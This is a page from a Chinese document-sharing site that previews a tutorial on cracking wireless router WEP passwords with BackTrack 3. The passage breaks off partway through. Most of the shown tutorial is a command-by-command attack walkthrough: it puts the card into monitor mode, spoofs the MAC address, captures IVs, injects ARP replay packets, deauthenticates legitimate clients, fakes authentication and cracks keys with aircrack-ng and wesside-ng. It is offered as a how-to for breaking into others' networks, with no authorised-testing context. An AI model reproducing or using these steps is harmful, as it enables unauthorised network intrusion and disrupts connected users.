返回
BT3无线密码无线路由破解教程(打印版).docx

BT3无线密码无线路由破解教程(打印版).docx

ID:61506748

大小:4.80 MB

页数:20页

时间:2021-02-08

BT3无线密码无线路由破解教程(打印版).docx_第1页
BT3无线密码无线路由破解教程(打印版).docx_第2页
BT3无线密码无线路由破解教程(打印版).docx_第3页
BT3无线密码无线路由破解教程(打印版).docx_第4页
BT3无线密码无线路由破解教程(打印版).docx_第5页
资源描述:

《BT3无线密码无线路由破解教程(打印版).docx》由会员上传分享,免费在线阅读,更多相关内容在应用文档-天天文库

1、开放式WEP破解1.装备:IMBX60笔记本(内置Intel3945无线网卡)、BT3的U盘系统(需用syslinux命令来指定启动BT3的盘符)2.用户名:root密码:toor,进入图形界面:startx。启动BT3后,(启动黑屏:xconf再输入startx)3.加载3945网卡的驱动。打开一个shell输入modprobe–riwl3945卸载原来的网卡驱动输入modprobeipwraw加载可监听的网卡驱动注:不同的网卡有不同的加载方式LINUX驱动是通过模块进行加载的,可以用lsmod来查看机器已加载的模块然后可以通过modinf

2、oipwraw(模块名)来查看所加载驱动模块的版本信息最新的ipwraw的版本是ipwraw-ng-2.3.4-.tar.bz2的。最新的版本需要设置rate为1M设置命令为iwconfigwifi0rate1M这个版本的驱动支持3945无线网卡发射功率得设置,命令如下iwconfigwifi0txpower16(TXPOWER是你想设置的值min=-12andmax=16,单位为dBm)参数on/off可以打开和关闭发射单元,auto和fixed指定无线是否自动选择发射功率。注:降低连接速率可提高建立虚拟连接的成功率和稳定性,提高发射功率可

3、增加发射距离。4.查找目标:可以用airodump-ngwifi0来搜索注:通过扫描获得你要破解的AP的MAC和SSID还有是否有客户端等信息。记录下这些信息后,请关闭此窗口。不然会出现后面建立虚拟连接时信道一直在跳转的情况。我们选择第一个作为目标,channel为11(上图中的CH代表信道)。注:修改自己网卡的MAC地址的命令。输入macchanger–m00:11:22:33:44:55wifi05.激活网卡的Monitor模式并工作在11信道。(加载网卡,激活监听模式,工作在11信道)输入airmon-ngstartwifi011也可用

4、iwconfiwifi0来查看网卡的工作模式和工作信道。可用aireplay-ng-9wifi0测试注入6.输入截取数据包命令(截取11信道的ivs数据包,并保存名为name.ivs)输入命令airodump-ng--ivs-wname-c11wifi0,(--ivs:仅截取ivs数据包,-w:写入文件,-c:截取ivs的信道)(其中name是获取的ivs的保存文件的名字,11是channel值,你根据实际修改)一.有客户端WEP破解1.有客户端,且合法客户端产生大量有效的数据,能直接获得大量IVS。思路:1-6步同上7.直接用aircrac

5、k-ng破解第七步:aircrack-ng-n64-bname-01.ivs2.有客户端,合法客户端只能产生少量ivs数据,就需要注入攻击加速产生大量ivs。只要有少量的数据就可能获得arp请求包,则可用arp注入模式的-3模式通过不断向AP发送同样的arp请求包,来进行注入式攻击。思路:1-6步同上7.用aireplay-ng的arp注入方式获得大量的ivs第七步:aireplay-ng-3-b-h<合法客户端mac>wifi0注:这一步可能时间会长一点,因为需要等到ARP。3.有客户端,但是客户端根本不在通信,

6、不能产生ARP包。-3注入模式不成功思路:1-6步同上7.-0冲突模式强制断开合法客户端和ap连接,使之重新连接8.利用-0冲突模式重新连接所产生的握手数据让-3获得有效的ARP从而完成ARP注入第七步:aireplay-ng-3-b-h<合法客户端mac>wifi0第八步:aireplay-ng-010–a-c<合法客户端mac>wifi04.有客户端,并且客户端能产生有效arp数据的另类破解方式前面的步骤一样:输入modprobe–riwl3945输入modprobeipwraw输入airmon-ngstart

7、wifi011现在,只要一个命令就搞定,输入:输入wesside-ng-iwifi0-v01:02:03:04:05:06(此格式的APMAC)。Wesside-ng这个命令其实就是一个-5碎片注入,fragmentation构造注入包,-3arp注入,最后PTW破解这样一个思路。二.无客户端开放式WEP破解思路:1-6步同上因为是无客户端,所以第一步就需要和AP之间建立一个虚拟连接。这是非常关键的一步。为让AP接受数据包,必须使自己的网卡和AP关联。如果没有关联的话,目标AP将忽略所有从你网卡发送的数据包,IVS数据将不会产生。第七步:输入

8、aireplay-ng-10-e-a-hwifi0如果回显虚拟伪装连接不成功,不能成功的原因很多,具体有如下几种:1、目标

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。